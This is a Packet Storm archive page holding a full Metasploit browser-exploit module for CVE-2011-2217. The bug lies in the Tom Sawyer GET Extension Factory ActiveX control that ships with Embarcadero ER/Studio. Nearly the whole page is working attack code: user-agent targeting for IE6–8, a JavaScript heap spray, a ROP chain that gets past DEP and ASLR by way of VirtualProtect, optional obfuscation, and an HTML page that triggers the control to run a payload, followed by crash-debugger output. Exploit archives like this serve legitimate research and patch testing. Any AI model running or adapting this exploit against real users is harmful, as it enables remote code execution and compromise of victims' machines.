Lucene search

K
packetstormRgodPACKETSTORM:113484
HistoryJun 11, 2012 - 12:00 a.m.

Tom Sawyer Software GET Extension Factory Remote Code Execution

2012-06-1100:00:00
rgod
packetstormsecurity.com
24

0.97 High

EPSS

Percentile

99.7%

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::Remote::BrowserAutopwn  
  
autopwn_info({  
:os_name => OperatingSystems::WINDOWS,  
:ua_name => HttpClients::IE,  
:ua_minver => "6.0",  
:ua_maxver => "8.0",  
:javascript => true,  
:rank => NormalRanking,  
:classid => "{658ED6E7-0DA1-4ADD-B2FB-095F08091118}"  
})  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Tom Sawyer Software GET Extension Factory Remote Code Execution",  
'Description' => %q{  
This module exploits a remote code execution vulnerability in the tsgetx71ex553.dll  
ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect  
initialization under Internet Explorer.  
  
While the Tom Sawyer GET Extension Factory is installed with some versions of VMware  
Infrastructure Client, this module has been tested only with the versions installed  
with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX  
control tested is tsgetx71ex553.dll, version 5.5.3.238.  
  
This module achieves DEP and ASLR bypass using the well known msvcr71.dll rop chain. The  
dll is installed by default with the Embarcadero software, and loaded by the targeted  
ActiveX.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Elazar Broad', # Vulnerability discovery  
'rgod', # PoC  
'juan vazquez' # Metasploit module  
],  
'References' =>  
[  
[ 'CVE', '2011-2217' ],  
[ 'OSVDB', '73211' ],  
[ 'BID', '48099' ],  
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=911' ]  
],  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00",  
'DisableNops' => true  
},  
'DefaultOptions' =>  
{  
'ExitFunction' => "process",  
'InitialAutoRunScript' => 'migrate -f'  
},  
'Platform' => 'win',  
'Targets' =>  
[  
# Embarcadero Technologies ER/Studio XE2  
# tsgetx71ex553.dll 5.5.3.238  
[ 'Automatic', {} ],  
[ 'IE 6 on Windows XP SP3',  
{  
'Rop' => nil,  
'Offset' => '0x00'  
}  
],  
[ 'IE 7 on Windows XP SP3',  
{  
'Rop' => nil,  
'Offset' => '0x800 - code.length'  
}  
],  
[ 'IE 8 on Windows XP SP3',  
{  
'Rop' => true,  
'Offset' => '0x0',  
'RopChainOffset' => '0x73e'  
}  
],  
[ 'IE 8 on Windows 7 SP1',  
{  
'Rop' => true,  
'Offset' => '0x0',  
'RopChainOffset' => '0x73e'  
}  
]  
],  
'Privileged' => false,  
'DisclosureDate' => "May 03 2011",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])  
], self.class)  
end  
  
def get_target(agent)  
#If the user is already specified by the user, we'll just use that  
return target if target.name != 'Automatic'  
  
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/  
return targets[1] #IE 6 on Windows XP SP3  
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/  
return targets[2] #IE 7 on Windows XP SP3  
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/  
return targets[3] #IE 8 on Windows XP SP3  
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/  
return targets[4] #IE 8 on Windows 7 SP1  
else  
return nil  
end  
end  
  
def junk(n=4)  
return rand_text_alpha(n).unpack("V").first  
end  
  
def nop  
return make_nops(4).unpack("V").first  
end  
  
def get_rop_chain(t)  
  
adjust =  
[  
junk, # heap sprayed to 342d1ea0  
0x7c1ce310, # stackpivot # push ecx # pop esp # pop edi # pop esi # retn 18 # mfc71.DLL  
0x7c347f98, # RETN (ROP NOP) # msvcr71.dll  
junk,  
junk,  
junk,  
junk,  
junk,  
junk  
].pack("V*")  
  
# chain generated by mona.py - See corelan.be  
rop =  
[  
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN  
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)  
0x7c347f98, # RETN (ROP NOP)  
0x7c3415a2, # JMP [EAX]  
0xffffffff,  
0x7c376402, # skip 4 bytes  
0x7c351e05, # NEG EAX # RETN  
0x7c345255, # INC EBX # FPATAN # RETN  
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN  
0x7c344f87, # POP EDX # RETN  
0xffffffc0, # Value to negate, will become 0x00000040  
0x7c351eb1, # NEG EDX # RETN  
0x7c34d201, # POP ECX # RETN  
0x7c38b001, # &Writable location  
0x7c347f97, # POP EAX # RETN  
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]  
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN  
0x7c345c30, # ptr to 'push esp # ret '  
].pack("V*")  
  
code = adjust  
code << rop  
  
return code  
end  
  
  
def on_request_uri(cli, request)  
agent = request.headers['User-Agent']  
my_target = get_target(agent)  
  
# Avoid the attack if the victim doesn't have the same setup we're targeting  
if my_target.nil?  
print_error("Browser not supported: #{agent.to_s}")  
send_not_found(cli)  
return  
end  
  
print_status("Target set: #{my_target.name}")  
  
p = payload.encoded  
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))  
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))  
js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))  
  
if my_target['Rop'].nil?  
js_shellcode = "var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);"  
else  
js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), Rex::Arch.endian(my_target.arch))  
js_shellcode = <<-JS_ROP  
var rop_chain = unescape("#{js_rop}");  
var nops_padding = nops.substring(0, 0x73e-code.length-offset.length);  
var shellcode = code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);  
JS_ROP  
js_shellcode = js_shellcode.gsub(/^\t\t\t/, '')  
end  
  
js = <<-JS  
var heap_obj = new heapLib.ie(0x20000);  
var code = unescape("#{js_code}");  
var nops = unescape("#{js_nops}");  
var nops_90 = unescape("#{js_90_nops}");  
  
while (nops.length < 0x80000) nops += nops;  
while (nops_90.length < 0x80000) nops_90 += nops_90;  
  
var offset = nops.substring(0, #{my_target['Offset']});  
#{js_shellcode}  
  
while (shellcode.length < 0x40000) shellcode += shellcode;  
var block = shellcode.substring(0, (0x80000-6)/2);  
  
  
heap_obj.gc();  
for (var z=1; z < 0x685; z++) {  
heap_obj.alloc(block);  
}  
  
JS  
  
js = heaplib(js, {:noobfu => true})  
  
#obfuscate on demand  
if datastore['OBFUSCATE']  
js = ::Rex::Exploitation::JSObfu.new(js)  
js.obfuscate  
end  
  
html = <<-EOS  
<html>  
<head>  
<script>  
#{js}  
</script>  
</head>  
<body>  
<object classid="clsid:658ED6E7-0DA1-4ADD-B2FB-095F08091118">  
</object>  
</body>  
</html>  
EOS  
  
html = html.gsub(/^\t\t/, '')  
  
print_status("Sending html")  
send_response(cli, html, {'Content-Type'=>'text/html'})  
  
end  
  
end  
  
=begin  
(b44.b48): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00000000 ebx=0013e27c ecx=342d1ea0 edx=00000000 esi=75c63d38 edi=80004002  
eip=28d2954d esp=0013e230 ebp=0013e2d4 iopl=0 nv up ei pl nz ac pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216  
tsgetx71ex553!Ordinal931+0x2dd:  
28d2954d ff5104 call dword ptr [ecx+4] ds:0023:342d1ea4=????????  
=end`